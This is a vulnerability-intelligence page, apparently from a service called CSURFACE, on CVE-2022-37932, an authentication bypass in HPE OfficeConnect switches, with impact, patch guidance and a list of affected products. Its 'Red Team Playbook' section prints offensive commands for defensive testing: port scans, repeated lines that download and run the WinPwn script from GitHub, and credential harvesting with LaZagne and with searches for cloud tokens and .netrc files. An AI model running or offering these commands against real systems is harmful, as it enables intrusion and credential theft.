CVE-2022-37932
Overview
This vulnerability is an authentication bypass affecting Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The root cause lies in improper validation of authentication credentials within the affected firmware, allowing unauthorized remote access. The flaw resides in the firmware components responsible for access control enforcement on these network switches.
Vulnerability Description
A potential security vulnerability has been identified in Hewlett Packard Enterprise OfficeConnect 1820, 1850, and 1920S Network switches. The vulnerability could be remotely exploited to allow authentication bypass. HPE has made the following software updates to resolve the vulnerability in Hewlett Packard Enterprise OfficeConnect 1820, 1850 and 1920S Network switches versions: Prior to PT.02.14; Prior to PC.01.22; Prior to PO.01.21; Prior to PD.02.22;
Impact
An attacker with network access can remotely bypass authentication controls without user interaction or privileges, gaining full administrative control over the affected switches. This enables unauthorized configuration changes, potential network disruption, and lateral movement within the enterprise environment. The vulnerability's CVSS vector indicates low attack complexity and no required privileges, highlighting the ease of exploitation over the network.
Solution
Hewlett Packard Enterprise has released firmware updates to address this issue in OfficeConnect 1820, 1850, and 1920S Network switches. Affected versions prior to PT.02.14, PC.01.22, PO.01.21, and PD.02.22 should be upgraded to the fixed releases. Detailed patch instructions and downloads are available in HPE advisory document emr_na-hpesbnw04383en_us at https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbnw04383en_us.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A significant security vulnerability has been identified in Hewlett Packard Enterprise's OfficeConnect 1820, 1850, and 1920S Network switches, which allows for authentication bypass. This flaw stems from improper validation of user credentials, enabling an attacker to gain unauthorized access to the device without needing valid authentication. The potential for remote exploitation increases the severity of this vulnerability, as it allows malicious actors to compromise network infrastructure from anywhere, posing a critical risk to organizations relying on these switches for their networking needs.
Attack vectors for this vulnerability are particularly concerning due to the ease with which they can be executed. An attacker could leverage automated tools to scan for vulnerable devices within a network, targeting those that have not been updated to the latest firmware versions. Once access is gained, the attacker could manipulate network configurations, intercept data, or even launch further attacks within the network. Scenarios could include redirecting traffic to malicious servers, executing denial-of-service attacks, or exfiltrating sensitive information. The remote nature of this vulnerability means that organizations may not even be aware that their devices have been compromised until significant damage has been done.
The real-world impact of this vulnerability on businesses can be profound. Compromised network switches can lead to unauthorized access to sensitive data, disruption of services, and potential financial losses. For organizations that handle sensitive customer information, such as financial institutions or healthcare providers, the repercussions could extend beyond immediate financial losses to include regulatory fines, reputational damage, and loss of customer trust. Furthermore, the interconnected nature of modern networks means that a breach in one area can have cascading effects throughout an organization, amplifying the overall risk.
To address this vulnerability, organizations must prioritize detection and mitigation strategies. Regularly updating firmware is essential, as HPE has released specific updates to remediate the issue in affected devices. Organizations should implement a robust patch management policy to ensure that all network devices are kept up to date with the latest security patches. Additionally, employing network segmentation can help limit the potential impact of a compromised device, restricting an attacker's ability to move laterally within the network. Continuous monitoring of network traffic for unusual patterns can also aid in early detection of unauthorized access attempts, allowing for swift incident response.
In conclusion, the authentication bypass vulnerability in Hewlett Packard Enterprise's OfficeConnect network switches represents a serious threat to organizations that utilize these devices. The potential for remote exploitation, coupled with the significant impact on business operations and data security, necessitates immediate attention. By adopting proactive measures such as timely firmware updates, network segmentation, and continuous monitoring, organizations can mitigate the risks associated with this vulnerability and strengthen their overall cybersecurity posture.
Affected Products (19)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Hpe | Officeconnect 1820 J9979a Firmware | All |
cpe:2.3:o:hpe:officeconnect_1820_j9979a_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1820 J9982a Firmware | All |
cpe:2.3:o:hpe:officeconnect_1820_j9982a_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1820 J9980a Firmware | All |
cpe:2.3:o:hpe:officeconnect_1820_j9980a_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1820 J9983a Firmware | All |
cpe:2.3:o:hpe:officeconnect_1820_j9983a_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1820 J9981a Firmware | All |
cpe:2.3:o:hpe:officeconnect_1820_j9981a_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1820 J9984a Firmware | All |
cpe:2.3:o:hpe:officeconnect_1820_j9984a_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1850 24g 2xgt Poe\+ Firmware | All |
cpe:2.3:o:hpe:officeconnect_1850_24g_2xgt_poe\+_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1850 24g 2xgt Firmware | All |
cpe:2.3:o:hpe:officeconnect_1850_24g_2xgt_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1850 48g 4xgt Poe\+ Firmware | All |
cpe:2.3:o:hpe:officeconnect_1850_48g_4xgt_poe\+_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1850 48g 4xgt Firmware | All |
cpe:2.3:o:hpe:officeconnect_1850_48g_4xgt_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1850 6xgt Firmware | All |
cpe:2.3:o:hpe:officeconnect_1850_6xgt_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1850 2xgt\/spf\+ Firmware | All |
cpe:2.3:o:hpe:officeconnect_1850_2xgt\/spf\+_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1920s 24g 2sfp Poe\+ Firmware | All |
cpe:2.3:o:hpe:officeconnect_1920s_24g_2sfp_poe\+_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1920s 24g 2sfp Ppoe\+ Firmware | All |
cpe:2.3:o:hpe:officeconnect_1920s_24g_2sfp_ppoe\+_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1920s 24g 2sfp Firmware | All |
cpe:2.3:o:hpe:officeconnect_1920s_24g_2sfp_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1920s 48g 4sfp Ppoe\+ Firmware | All |
cpe:2.3:o:hpe:officeconnect_1920s_48g_4sfp_ppoe\+_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1920s 48g 4sfp Firmware | All |
cpe:2.3:o:hpe:officeconnect_1920s_48g_4sfp_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1920s 8g Ppoe\+ Firmware | All |
cpe:2.3:o:hpe:officeconnect_1920s_8g_ppoe\+_firmware:*:*:*:*:*:*:*:*
|
|
|
Hpe | Officeconnect 1920s 8g Firmware | All |
cpe:2.3:o:hpe:officeconnect_1920s_8g_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Tim-Hoekstra/CVE-2022-37932
|
Tim-Hoekstra | 2 | 0 | 2025-04-10 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-37932 |
| support.hpe.com |
GitHub CVE
|
https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbnw04383en_us |